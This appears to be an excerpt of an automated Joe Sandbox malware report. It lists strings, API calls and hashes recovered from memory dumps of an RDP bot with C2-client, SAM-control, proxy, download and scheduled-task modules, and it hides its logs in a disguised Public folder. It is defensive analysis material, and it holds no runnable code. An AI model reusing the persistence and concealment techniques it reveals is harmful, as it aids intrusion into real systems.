                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                                                                                                                                  • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                                                                                                                                  • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreestrcpystrlen
                                                                                                                                                  • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                                                                                                                                  • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$cnccli$ini_get_var$server_host
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$cnccli$ini_get_sec$server_host
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                                                                                                                                                  • Instruction ID: 799effd68652332ccc69ce4f3674460035339f01548c6f7b314710808e2707e1
                                                                                                                                                  • Opcode Fuzzy Hash: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                                                                                                                                                  • Instruction Fuzzy Hash: D1311764E09A9385FA129F1DE8603B52361AF44BC4F9AC435DB4D1B2A4EF6CF985F300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                                                                                                                                                  • Instruction ID: ad2bfea5774450aa2002049a40baa09234ccdd700e424db7ae88bcff5981aac5
                                                                                                                                                  • Opcode Fuzzy Hash: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                                                                                                                                                  • Instruction Fuzzy Hash: D5314169E0DA8781FA549F4CE8807746352AF45BD4FA98031DB0D473A5EF2CE946F390
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                                                                                                                                                  • Instruction ID: 6af90cc4b8b3021cbfa118ed8a0c5d89c4f2d72fedbe9bc540b588d1d096dc21
                                                                                                                                                  • Opcode Fuzzy Hash: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                                                                                                                                                  • Instruction Fuzzy Hash: 56310CA2E09607A1FE519BDDE8603B97362AF44BC4F588435DA4E1B7A1EE3CF8558340
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                                                                                                                                                  • Instruction ID: 5b66072a1bff8190818ed39ff715ad96b81ae6efc3ba16493f5d8e0044077d6f
                                                                                                                                                  • Opcode Fuzzy Hash: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                                                                                                                                                  • Instruction Fuzzy Hash: 1E310E61F0961791FE109F8DE8407B52791AF84FC5F989535CB4E473A6EE2CA945C340
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                                                                                                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                                                                                                                                  • API String ID: 3179112426-3318474754
                                                                                                                                                  • Opcode ID: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                                                                                                                                                  • Instruction ID: 86d01740d5396e5df4845fb854c92d21b9e2246347f93b25eb4ff050f73164ba
                                                                                                                                                  • Opcode Fuzzy Hash: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                                                                                                                                                  • Instruction Fuzzy Hash: 8331D650E1C68382FB215F5CA4C03B86294AF063E4F664932C75E462B3DE5DBD85B322
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                                                                                                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                                                                                                                                  • API String ID: 3179112426-2019511216
                                                                                                                                                  • Opcode ID: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                                                                                                                                                  • Instruction ID: 314d58a39b00f78a14d885fedfcd0eb8c61d4e20236455cca1c6c31ad79b8b6f
                                                                                                                                                  • Opcode Fuzzy Hash: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                                                                                                                                                  • Instruction Fuzzy Hash: 1F31E960E0C78782FB215F1CA4D83BD22629F043C4FA65536D70E462A1DE7EB985F751
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcpy
                                                                                                                                                  • String ID: *$schtasks
                                                                                                                                                  • API String ID: 2790333442-2394224502
                                                                                                                                                  • Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                                                                                                                                                  • Instruction ID: f017f95ccd4d3db41075cf4927f4eaf6275528c8b95376693cd10ad4b39e639a
                                                                                                                                                  • Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                                                                                                                                                  • Instruction Fuzzy Hash: EF512722B4C68385FB619B5DA8953BD5351AB853C0F4920B5EF8E473D6DE3ED9088701
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                                                                                                                                  • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                                                                                                                                  • API String ID: 3537583691-1494920791
                                                                                                                                                  • Opcode ID: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                                                                                                                                                  • Instruction ID: ce6187fb85f68c21e816d0cc6951bf6f5c68bbff2cc0ac4a4235a3db22c9c354
                                                                                                                                                  • Opcode Fuzzy Hash: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                                                                                                                                                  • Instruction Fuzzy Hash: CD416AA2A88B0282EB109F99E954BBA67A1FB44BD8F544039DF4D43795EF3CE445C700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                                                                                                                                  • API String ID: 513531256-4171087551
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CopyErrorFileLastfflushfwrite
                                                                                                                                                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
